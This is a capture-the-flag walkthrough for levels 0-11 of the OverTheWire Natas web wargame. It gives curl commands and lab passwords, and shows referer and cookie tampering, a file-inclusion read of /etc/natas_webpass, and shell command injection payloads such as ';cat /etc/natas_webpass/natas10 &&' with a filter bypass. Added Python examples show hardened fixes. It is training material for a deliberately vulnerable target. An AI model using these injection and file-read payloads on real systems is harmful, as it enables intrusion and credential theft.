@miglen
Last active November 14, 2018 15:41
OverTheWire - Natas challenge

URL: http://overthewire.org/wargames/natas/
Type: Web

Natas Level 0

curl -s -u natas0:natas0 http://natas0.natas.labs.overthewire.org

The password is hidden in the source-code.

Natas Level 1

curl -s -u natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org

The password is hidden in the source-code.

Natas Level 2

curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org

There's a new image on the page; under the directory /files there's a txt file with a secret.

curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/
curl -s -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/users.txt | grep natas3 | cut -d":" -f 2

Natas Level 3

curl -s -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org

There's a hint in the source-code: Google Search: https://www.google.com/search?q=site:natas3.natas.labs.overthewire.org and there's a /s3cr3t path in the results. The path contains a users.txt file with the password.

curl -s -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt

Natas Level 4

curl -s -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

The page answers: Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/". So we add a Referer header and we get the password:

curl -s -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org -H 'Referer: http://natas5.natas.labs.overthewire.org/'

Natas Level 5

curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org

The page says that you are not logged in. Check the response headers:

curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -I
...
Set-Cookie: loggedin=0
...

It seems that the loggedin cookie is 0. We set it to 1 and retry:

curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -H 'Cookie: loggedin=1' | grep password

Natas Level 6

curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org

We see a submit form as well as index-source.html. That page includes the file includes/secret.inc and compares the submitted value against the secret defined there, so we fetch that file:

curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/index-source.html
curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Once we have the secret, we submit it through the form:

curl -s -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/ -d 'secret=FOEIUWGHFEEUHOFUOIU&submit=Submit'

Natas Level 7

curl -s -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org

We get a hint, and the page is loaded through an include parameter: index.php?page=home. So we try a file path instead:

curl -s -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Natas Level 8

curl -s -u natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe http://natas8.natas.labs.overthewire.org

Again we have a view-source page with the following script:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

So what we need to do is reverse the encodeSecret function and decode the encodedSecret string:

php -r 'echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));'
# Output:
oubWYf2kBq
curl -s -u natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe http://natas8.natas.labs.overthewire.org -d 'secret=oubWYf2kBq&submit=Submit'
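The decoding above, as an added example that is not part of the gist: a Python port of the page's encodeSecret() and its inverse, plus an assumed hardened variant (store_secret/check_secret, not the challenge's code) showing why a keyless encoding is not a secret while a digest comparison cannot be reversed from the stored value.

```python
import base64
import binascii
import hashlib
import hmac

# Value copied from the natas8 view-source shown above.
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Python port of the PHP encodeSecret(): bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode())            # base64_encode
    return binascii.hexlify(b64[::-1]).decode()        # strrev, then bin2hex


def decode_secret(encoded: str) -> str:
    """Inverse of encode_secret(): undo each step in reverse order. This is possible
    because all three steps are keyless, invertible encodings, not hashes."""
    reversed_b64 = binascii.unhexlify(encoded)         # hex2bin
    return base64.b64decode(reversed_b64[::-1]).decode()  # strrev, then base64_decode


def store_secret(secret: str) -> str:
    """Hardened storage (assumed fix, not the challenge's code): keep only a SHA-256
    digest. Unlike ENCODED_SECRET, the stored value cannot be turned back into the secret.
    For a low-entropy secret a password KDF such as hashlib.pbkdf2_hmac would be better."""
    return hashlib.sha256(secret.encode()).hexdigest()


def check_secret(candidate: str, stored_digest: str) -> bool:
    """Constant-time comparison of the candidate's digest against the stored one."""
    return hmac.compare_digest(store_secret(candidate), stored_digest)


if __name__ == "__main__":
    secret = decode_secret(ENCODED_SECRET)
    print(secret)                                      # oubWYf2kBq
    assert encode_secret(secret) == ENCODED_SECRET     # round trip confirms the port
    stored = store_secret(secret)
    print(check_secret("oubWYf2kBq", stored), check_secret("wrong", stored))  # True False
```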

Natas Level 9

curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org

Again there's a view-source, and it shows that the input is passed straight to a shell command:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

So if we simply provide ; SHELL_COMMAND && as the input, we are able to execute whatever we want. Of course this runs in a chroot, so not much can be done, but we can read lots of files. After a bit of searching I found an interesting file, /etc/natas_webpass/natas10, owned by the current user's group (natas9).

# find / -type f -group natas9 # to find all files owned by our group
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;find / -type f -group natas9  &&' -d 'submit=Search'
# get the file contents
curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;cat /etc/natas_webpass/natas10 &&' -d 'submit=Search'

Natas Level 10

curl -s -u natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu http://natas10.natas.labs.overthewire.org

Again we have a view-source with the following contents:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

From the previous level we can notice a shift in user/group ownership of the password files, so we first check the natas11 file from there:

curl -s -u natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl http://natas9.natas.labs.overthewire.org/ --data-urlencode 'needle=;ls -ltrah /etc/natas_webpass/natas11 &&' -d 'submit=Search'
# Output:
-r--r----- 1 natas11 natas10 33 Dec 20  2016 /etc/natas_webpass/natas11

So we simply grep the contents of that file using the current level's access: the filter blocks ; | and &, but nothing stops us from adding the file as an extra grep argument and commenting out dictionary.txt with #:

curl -s -u natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu http://natas10.natas.labs.overthewire.org -d 'submit=Search' --data-urlencode 'needle=. /etc/natas_webpass/natas11 #'
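The level 9 and level 10 input handling, as an added example that is not part of the gist: the level-10 blacklist reimplemented beside an assumed hardened version (allowlist_allows and safe_grep are this example's own names, not the challenge's code), run against the two needle values from this writeup and a constructed sample dictionary.

```python
import os
import re
import subprocess
import tempfile

# Constructed sample standing in for the challenge's dictionary.txt.
SAMPLE_DICTIONARY = "apple\nbanana\ncherry\n"

# Needle values quoted from this writeup, reused here only as filter test inputs.
LEVEL9_NEEDLE = ";cat /etc/natas_webpass/natas10 &&"
LEVEL10_NEEDLE = ". /etc/natas_webpass/natas11 #"

def blacklist_allows(needle: str) -> bool:
    """The level-10 check: reject only ';', '|' and '&'; anything else reaches the shell."""
    return re.search(r"[;|&]", needle) is None

def allowlist_allows(needle: str) -> bool:
    """Hardened check (assumed fix, not the challenge's code): accept only what a
    dictionary lookup needs. Spaces, '/', '#', '.' and '-' are all rejected, so neither
    shell metacharacters nor extra grep arguments can be smuggled in."""
    return re.fullmatch(r"[A-Za-z0-9]{1,64}", needle) is not None

def safe_grep(needle: str, dictionary_path: str) -> list:
    """Hardened invocation: validate, then run grep without a shell as an argv list,
    with '--' so the needle can never be parsed as an option or an extra file."""
    if not allowlist_allows(needle):
        raise ValueError("needle contains characters outside the allowlist")
    proc = subprocess.run(["grep", "-i", "--", needle, dictionary_path],
                          capture_output=True, text=True, check=False)
    return proc.stdout.splitlines()

def search_sample(needle: str) -> list:
    """Run safe_grep() against the constructed sample dictionary."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
        handle.write(SAMPLE_DICTIONARY)
    try:
        return safe_grep(needle, handle.name)
    finally:
        os.unlink(handle.name)

if __name__ == "__main__":
    # The blacklist stops the level-9 payload but lets the level-10 bypass through.
    print(blacklist_allows(LEVEL9_NEEDLE), blacklist_allows(LEVEL10_NEEDLE))    # False True
    # The allowlist rejects both, and safe_grep() never builds a shell command string.
    print(allowlist_allows(LEVEL9_NEEDLE), allowlist_allows(LEVEL10_NEEDLE))    # False False
    print(search_sample("AN"))                                                   # ['banana']
```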

Natas Level 11

curl -s -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org